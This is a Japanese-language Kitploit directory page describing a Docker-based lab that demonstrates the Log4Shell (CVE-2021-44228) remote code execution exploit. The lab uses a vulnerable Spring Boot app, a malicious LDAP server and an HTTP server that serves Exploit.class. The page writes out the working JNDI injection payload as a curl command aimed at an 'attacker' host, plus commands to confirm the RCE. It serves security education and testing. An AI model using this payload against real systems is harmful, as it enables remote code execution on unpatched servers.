Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44228_Log4Shell — DockerベースのLog4Shell (CVE-2021-44228) RCEエクスプロイトデモ。脆弱性のあるSpring Bootアプリ、悪意のあるLDAPサーバ、およびJNDIインジェクションを介したペイロード配信を備えています。 | Kitploit
ツール/GitHubGitHub/vutiendat323/cve-2021-44228_log4shell
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubvutiendat323/cve-2021-44228_log4shell

CVE-2021-44228_Log4Shell

DockerベースのLog4Shell (CVE-2021-44228) RCEエクスプロイトデモ。脆弱性のあるSpring Bootアプリ、悪意のあるLDAPサーバ、およびJNDIインジェクションを介したペイロード配信を備えています。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
3ヶ月前未レビュー

Log4Shell脆弱性(CVE-2021-44228)の悪用デモ

このプロジェクトは、Apache Log4j 2ライブラリのLog4Shell脆弱性を介したRCE攻撃シナリオをシミュレートします。

コンポーネント

  1. vulnerable-app: Log4j 2.14.1を使用するSpring Bootアプリケーション。
  2. attacker: 悪意のあるLDAPサーバー(marshalsec)と、悪意のあるコードファイルExploit.classを提供するHTTPサーバーを含みます。

実行方法

1. 環境の起動

DockerとDocker Composeがインストールされている必要があります。

root@kitploit:~
docker compose up --build

両方のコンテナが準備できるまで待ちます。vulnerable-appはポート8080で実行されます。

2. 攻撃の実行

新しいターミナルを開き、X-Api-Versionヘッダーを介してJNDIペイロードを含むリクエストを送信します:

root@kitploit:~
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/

3. 結果の確認

  • vulnerable-appコンテナのログを確認します。ペイロードがログに記録されたメッセージが表示されます。
  • attackerコンテナのログを確認します。LDAP接続がHTTPサーバーにリダイレクトされていることがわかります。
  • RCEの確認: /tmp/pwnedファイルがvulnerable-appコンテナ内に作成されたかどうかを確認します:
root@kitploit:~
docker exec -it vulnerable-app ls -la /tmp/pwned

ファイルが存在する場合、悪意のあるコードExploit.classが正常に実行されたことを示します!

警告

このプロジェクトは教育およびセキュリティ研究のみを目的としています。違法な目的で使用しないでください。

ツールをダウンロード